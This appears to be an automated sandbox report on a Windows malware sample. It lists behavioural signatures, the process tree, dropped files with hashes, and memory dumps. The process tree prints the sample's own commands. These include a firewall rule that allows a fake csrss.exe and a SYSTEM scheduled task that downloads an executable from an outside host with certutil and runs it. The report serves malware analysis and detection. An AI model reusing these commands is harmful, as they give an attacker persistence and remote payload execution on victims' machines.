Analysis
-
max time kernel
51s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
24-05-2022 00:39
Static task
static1
Behavioral task
behavioral1
Sample
988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe
Resource
win10v2004-20220414-en
General
-
Target
988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe
-
Size
3.8MB
-
MD5
795847175d72c68819a2f8e0dfed1e98
-
SHA1
00c46c3540cbaa0b5a3e072ad0cd6a35fad49102
-
SHA256
988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059
-
SHA512
316eb4693aa242f94ee9071d6a82db81ec851dd40cee6879c2ea924fed7c3ae9ab02e7cab5a7c51231a54c3ffc4df3536a5ff5b99902f8a8af440232357c9d5a
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 1992 bcdedit.exe -
Drops file in Windows directory 1 IoCs
Processes:
makecab.exedescription ioc process File created C:\Windows\Logs\CBS\CbsPersist_20220524024008.cab makecab.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1044 schtasks.exe 1552 schtasks.exe -
Modifies data under HKEY_USERS 9 IoCs
Processes:
netsh.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exepid process 1668 1688 988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description pid process Token: SeDebugPrivilege 1668 Token: SeImpersonatePrivilege 1668 -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.execmd.exedescription pid process target process PID 1688 wrote to memory of 392 1688 988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe cmd.exe PID 1688 wrote to memory of 392 1688 988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe cmd.exe PID 1688 wrote to memory of 392 1688 988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe cmd.exe PID 1688 wrote to memory of 392 1688 988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe cmd.exe PID 392 wrote to memory of 1376 392 cmd.exe netsh.exe PID 392 wrote to memory of 1376 392 cmd.exe netsh.exe PID 392 wrote to memory of 1376 392 cmd.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe"C:\Users\Admin\AppData\Local\Temp\988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe"C:\Users\Admin\AppData\Local\Temp\988103f227a80a74be7836bd77d6dfd70c3bedff8c6f574e5818a5f6e52fe059.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://10gamestop.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524024008.log C:\Windows\Logs\CBS\CbsPersist_20220524024008.cab1⤵
- Drops file in Windows directory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.7MB
MD50ff91f4b377c7c2863203db082008dab
SHA1f4591579374e34b4f191b4d545a750699c11dbbf
SHA256183fb0810a5341949beb501c48f62b9a138ff407b3b227ba90463e316bbf312d
SHA512e186af107a3f117251c2d4d67fe837f07fe7fb12404cd2825bb3b1d37a4a900bda39e72ce7a007358f6c593cfb298103d1de2ec89c1db1f9584a0b5e29bff611
-
C:\Windows\rss\csrss.exeFilesize
1.7MB
MD5468fb7226d87c7a20ffeaaaa0e590f4d
SHA10646fac7c0165b5ccc6a565bacff771e9ffb05af
SHA25650adcfb85cb32b2ed157c9561445756a18477912e34f23e20d1f0ddfa2890840
SHA512ef75e3ee2102d03fcc77254e78fd493e44b15fefea3b10c8e8461fbaf6d6c689068da71026aa1e3b9bb2148a59ec0b96245836ac780e82d3146e8e9b0bf93921
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.6MB
MD5b53c990c073ffd126959a8499713f64f
SHA176bc78df558aeb57fb7c018f8698a53ec2cc0d05
SHA2567b27621418cfaa198bdd3ce0e54025c349c0f2ba9fa59305dbed992e98462e8d
SHA51283e6a411a9b919a7f59d684beae8a3f4e08c9f8fc4476db0b1da95045bbbeaf5221b673023d9c2ef19f59e1463de913313535b9ab8e56d15233b77ad8c97c7aa
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.6MB
MD55264952e8737ac15f20d3c98ab2344b7
SHA142ae15090a07cb484fa4591b7deb7ec8d8c46e8a
SHA256435fd2f77b2d2f8b327530f155477f4a1aad18248f42714473ab25e54054e7cc
SHA5121e25bbd388d79a8e7e144c273f6bb355810c26e13d34b161250c7981fba05e76698c8990671d47e278461b59afae3d2c5626c6469b46d371c9864cc979dc007e
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.4MB
MD55b4a47b5df2d614121b2c0da2e81415d
SHA1ff32f21822d61d50c7e9d1cec7196cb68461630b
SHA2569a7f5dd2aaf997582f9fb4e063541fd7f169ce36dba8c5e70d8cb14514813311
SHA512d3bf36567ceadc9e6e8f06f4913f6def28e381ce7e0591d3e3c976c300f82ec204086094cff3d7c47a8cbb9a208f2966402b3fefa6857b05566f34da8858b664
-
\Users\Admin\AppData\Local\Temp\dbghelp.dllFilesize
1.5MB
MD5f0616fa8bc54ece07e3107057f74e4db
SHA1b33995c4f9a004b7d806c4bb36040ee844781fca
SHA2566e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA51215242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
1.6MB
MD5549c507534224ca632ee2d4a0e291732
SHA195baa4be0e2fe53d8e6f02ee74e86d73c459e613
SHA256245c7f5db1cc4dae389d184dfdf390be83dca3a3278664e6ffc954bb5f2d2f57
SHA512c2e52efa31a997e3bcb1929009160378c93c91f3137eb9757cd748049b666ad5236f81e4228b511e12cdc555c416fad45f5a12be82b443eac26187b3a5437101
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
1.6MB
MD5549c507534224ca632ee2d4a0e291732
SHA195baa4be0e2fe53d8e6f02ee74e86d73c459e613
SHA256245c7f5db1cc4dae389d184dfdf390be83dca3a3278664e6ffc954bb5f2d2f57
SHA512c2e52efa31a997e3bcb1929009160378c93c91f3137eb9757cd748049b666ad5236f81e4228b511e12cdc555c416fad45f5a12be82b443eac26187b3a5437101
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
1.9MB
MD5bd2abca95ca004e9f2ab84adfe740d7e
SHA1aa4c990c6c55ad27c1423eb90e3594a260cd6f54
SHA2561888a8b32a40a33dc3aaa79f13f4c76d9af705705f63769b2a0d2ddb5e5462d0
SHA5124385bf23fef7ce2b7e08cf4d35fbf970d82dd9e6e94dc82398c1e311a3925a9a634b69dec9fecf02383be8d9b0bad6bb1882455320b5319e646e1234cd1f5e31
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
591KB
MD5e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
591KB
MD5e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
591KB
MD5e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
\Users\Admin\AppData\Local\Temp\symsrv.dllFilesize
163KB
MD55c399d34d8dc01741269ff1f1aca7554
SHA1e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA5128ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d
-
\Windows\rss\csrss.exeFilesize
1.8MB
MD55d7f1c8130bdd8a0457a3a1fe6bb211d
SHA11cbd0607150f3c05824cb65f62d5d1da33fa47e1
SHA2565c5d5f0291e5b78f301e1c301aa2be5cd0395b6b9170e24f8eedf75fff279428
SHA5121df4a0cfac57236fb132f379a546b95c4694fa6b8d75822f7d3612cd135faacc8d335b4709aeba0a5ea7bb260c52d070b8fa82d99ef247cfa6994f28f2468813
-
\Windows\rss\csrss.exeFilesize
1.7MB
MD5387f2e9dc0514b1638fcd819a91c13cd
SHA1f3b83839314ace18f2e856b05df47d5ee61fbdeb
SHA256dd0182e658924a5c239917096aa61983d0a690c55877eeeb7772dbaccfe750d2
SHA5121c1c2900a9caf69e8c7952559614c9d826426ebe014887c0a32a2884cd110137afe98acbf0fc87762dd69a833305278c7f3e93fa73238cd76b59fa9b66551d80
-
memory/392-61-0x0000000000000000-mapping.dmp
-
memory/1376-63-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmpFilesize
8KB
-
memory/1376-62-0x0000000000000000-mapping.dmp
-
memory/1668-54-0x0000000002580000-0x0000000002926000-memory.dmpFilesize
3.6MB
-
memory/1668-55-0x0000000002580000-0x0000000002926000-memory.dmpFilesize
3.6MB
-
memory/1668-56-0x0000000002930000-0x0000000003026000-memory.dmpFilesize
7.0MB
-
memory/1668-57-0x0000000000400000-0x0000000000B10000-memory.dmpFilesize
7.1MB
-
memory/1688-58-0x0000000002450000-0x00000000027F6000-memory.dmpFilesize
3.6MB
-
memory/1688-60-0x0000000000400000-0x0000000000B10000-memory.dmpFilesize
7.1MB
-
memory/1688-59-0x0000000002450000-0x00000000027F6000-memory.dmpFilesize
3.6MB
-
memory/1756-68-0x0000000002480000-0x0000000002826000-memory.dmpFilesize
3.6MB
-
memory/1756-66-0x0000000000000000-mapping.dmp
-
memory/1756-72-0x0000000000400000-0x0000000000B10000-memory.dmpFilesize
7.1MB
-
memory/1756-71-0x0000000002480000-0x0000000002826000-memory.dmpFilesize
3.6MB
-
memory/1992-84-0x0000000000000000-mapping.dmp